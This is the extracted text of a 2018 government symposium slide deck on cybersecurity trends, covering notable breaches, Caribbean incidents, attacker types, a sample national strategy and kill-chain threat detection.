View
225
Download
0
Category
Preview:
Citation preview
The better the question. The better the answer�.The better the world works.
Cybersecurity: Trends and Challenges
21st Century Government – City Next Antigua 2018 Symposium
Page 2
“I get hired to hack into computers now and
sometimes it's actually easier than it was years
ago.”
-- Kevin Mitnick
Page 6
Some breaches you may know
Equifax - 145 million people
July 2017
NSA spy tools
leaked to internet …
April 2017
Yahoo -1B accounts hacked
2013/2014/2016/2017
50TB of NSA data stolen
over 20 years…
Cryptocurrency Miner …
compromized (60M)
Dec 2017
Uber – 57M customer records
breached… 2016
Swift hack –81M missing (attempted
850M) … 2016
Thousands of voter role
records were accessed
Sep 2016
Ransomware/WannaCry-
300,000
computers…May 2016
Ransomware
infects 400,000
computers 2017
Page 9
Why
► Attackers are increasingly making use of tools already installed on targeted
computers, like PowerShell, PSExec, or WMI
► Minimizes the risk of an attack being blocked
► Less chance of being detected by traditional security tools
► Running simple scripts and shellcode directly in memory.
► Hide in plain sight
► Clickless infections
Page 10
Complexity of threats
Unsophisticated
attackers (script
kiddies)
You are on the internet and have
vulnerability.
Sophisticated
attackers (hackers)
You are on the internetand have information of
value.
Corporate espionage(insider)
Current or former employeeseeks gain from selling
intellectual property (IP).
State-sponsored attacks Advanced persistent
threat (APT)
You are targeted because of who you are,what you do, or the value of your IP.
Ris
k
Attacker resource and sophistication
Monetization
State-sponsored espionage
Experimentation
Corporate espionageInitial
exploitationData
exfiltration
Intelligence
gathering
Command
and control
Privilege
escalation
APT life cycle
Page 11
Closer to home
Trinidad news media group
website hacked …
2016
Thousands of credit cards
hacked
(Bahamas)… 2013
Government Minster SM
account hacked …
2016
Four state bodies hacked in two weeks (Jamaica)…
Feb 2016
Militant group hacks Gov’t of St. Vincent’s website …
2015
Bank account thefts over Christmas
period2015
Regional Telecom. provider
hacked … 2013
Six government
websites compromized
2015
National Cybersecurity Strategy (SAMPLE)
• PROTECT CRITICAL
INFRASTRUCTURE
• DEVELOP HUMAN CAPITAL
• COOPERATE WITH PARTNERS
• DEFEND & RESPOND
• IMPROVE THREAT AWARENESS
• DEVELOP TECHNICAL
CAPABILITIES
• PROTECT CRITICAL
INFRASTRUCTURE
• DEVELOP HUMAN CAPITAL
• COOPERATE WITH PARTNERS
• DEFEND & RESPOND
• IMPROVE THREAT AWARENESS
• DEVELOP TECHNICAL
CAPABILITIES
FOCUS
POLICY
• Entity 1
• Entity 2
• Entity
• Etc.
ENTITYSECTOR
GOVERNANCE
STANDARDS
INFORMATION
• Health
• Transport
• Oil & Gas
• Financial
• Etc.
Information Assurance
Technical Forums
National Incident
Response
Working Group
National Awareness &
Capability Building
Committee
National Policy
Working Group
Public Sector Cybersecurity Strategy (SAMPLE)
Page 16
Mission: Comprehensive operational anomaly detection throughout the kill chain
Threat detection
Attack (Kill) chain progression
Background research
Steal dataInitial attackEstablishfoothold
Enablepersistence
Enterprise recon
Move laterally
Escalate privilege
Gather and encrypt data
Detection that email is malicious
Detection that communication with
attacker exists
Detection that programs or services are malicious
Detection that reconnaissance behavior exists
Detection that traversal behavior exists
Detection that staging behavior exists
Detection that privilege escalation behavior exists
Detection that exfiltration
behavior exists
Page 17
What the next generation of tools look like
Vendor Network
Internal
reconnaissance
La
tera
l M
ov
em
en
t
HVA Interconnect
HVA devices
►Self-learning models on each pair of communicating nodes
►Use cases covered:
►Lateral detection
►Reconnaissance detection
►Data Staging detection
►Can be tuned to be sensitive to most pressing threats including
►High Value Assets (HVA)
► Insider threat
►External attackers
►Operational Technology
► IoT monitoring
►3rd party vectors
►POS, etc
Highlights
‘PathScan’ detects attacks across interconnected networks
Recommended